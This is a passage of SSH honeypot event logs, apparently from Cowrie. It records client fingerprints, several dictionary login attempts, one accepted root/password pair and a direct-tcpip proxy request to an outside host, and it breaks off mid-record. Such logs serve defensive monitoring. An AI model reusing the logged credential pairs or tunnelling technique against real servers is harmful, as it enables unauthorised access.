{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:09:55.190691Z","src_ip":"212.227.235.229","session":"5cd3aa556b53"}
{"eventid":"cowrie.login.failed","username":"helpdesk","password":"helpdesk","message":"login attempt [helpdesk/helpdesk] failed","sensor":"my-vps","timestamp":"2025-08-26T04:09:57.351385Z","src_ip":"212.227.235.229","session":"5cd3aa556b53"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:09:58.611412Z","src_ip":"212.227.235.229","session":"5cd3aa556b53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47040,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb26074601a","protocol":"ssh","message":"New connection: 212.227.235.229:47040 (1.2.3.4:22) [session: 4eb26074601a]","sensor":"my-vps","timestamp":"2025-08-26T04:10:02.997408Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:03.178175Z","src_ip":"212.227.235.229","session":"4eb26074601a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:03.254653Z","src_ip":"212.227.235.229","session":"4eb26074601a"}
{"eventid":"cowrie.login.failed","username":"anton","password":"anton","message":"login attempt [anton/anton] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:05.289993Z","src_ip":"212.227.235.229","session":"4eb26074601a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47050,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7cb2e3a2dfc","protocol":"ssh","message":"New connection: 212.227.235.229:47050 (1.2.3.4:22) [session: b7cb2e3a2dfc]","sensor":"my-vps","timestamp":"2025-08-26T04:10:05.759483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.035264Z","src_ip":"212.227.235.229","session":"b7cb2e3a2dfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36572,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bda56568d64","protocol":"ssh","message":"New connection: 212.227.125.160:36572 (1.2.3.4:22) [session: 4bda56568d64]","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.141892Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.143331Z","src_ip":"212.227.125.160","session":"4bda56568d64"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.214457Z","src_ip":"212.227.235.229","session":"b7cb2e3a2dfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36834,"dst_ip":"1.2.3.4","dst_port":22,"session":"70e929cd184c","protocol":"ssh","message":"New connection: 212.227.125.160:36834 (1.2.3.4:22) [session: 70e929cd184c]","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.253488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.254644Z","src_ip":"212.227.125.160","session":"70e929cd184c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.368203Z","src_ip":"212.227.125.160","session":"70e929cd184c"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.545400Z","src_ip":"212.227.235.229","session":"4eb26074601a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.710265Z","src_ip":"212.227.125.160","session":"70e929cd184c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T04:10:06.824902Z","session":"70e929cd184c"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:07.520738Z","src_ip":"212.227.235.229","session":"b7cb2e3a2dfc"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:10:09.211183Z","src_ip":"212.227.235.229","session":"b7cb2e3a2dfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54508,"dst_ip":"1.2.3.4","dst_port":22,"session":"518e4f84e244","protocol":"ssh","message":"New connection: 212.227.235.229:54508 (1.2.3.4:22) [session: 518e4f84e244]","sensor":"my-vps","timestamp":"2025-08-26T04:10:13.540896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:13.587955Z","src_ip":"212.227.235.229","session":"518e4f84e244"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:13.841763Z","src_ip":"212.227.235.229","session":"518e4f84e244"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54516,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc651060c705","protocol":"ssh","message":"New connection: 212.227.235.229:54516 (1.2.3.4:22) [session: fc651060c705]","sensor":"my-vps","timestamp":"2025-08-26T04:10:14.247471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:14.370112Z","src_ip":"212.227.235.229","session":"fc651060c705"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:10:14.580716Z","src_ip":"212.227.235.229","session":"fc651060c705"}
{"eventid":"cowrie.login.failed","username":"software","password":"software","message":"login attempt [software/software] failed","sensor":"my-vps","timestamp":"2025-08-26T04:10:15.868416Z","src_ip":"212.227.235.229","session":"fc651060c705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54530,"dst_ip":"1.2.3.4","dst_port":22,"session":"027855791de5","protocol":"ssh","message":"New connection: 212.227.235.229:54530 (1.2.3.4:22) [session: 027855791de5]","sensor":"my-vps","timestamp":"2025-08-26T04:10:16.020683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:10:16.141041Z","src_ip":"212.227.235.229","session":"027855791de5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-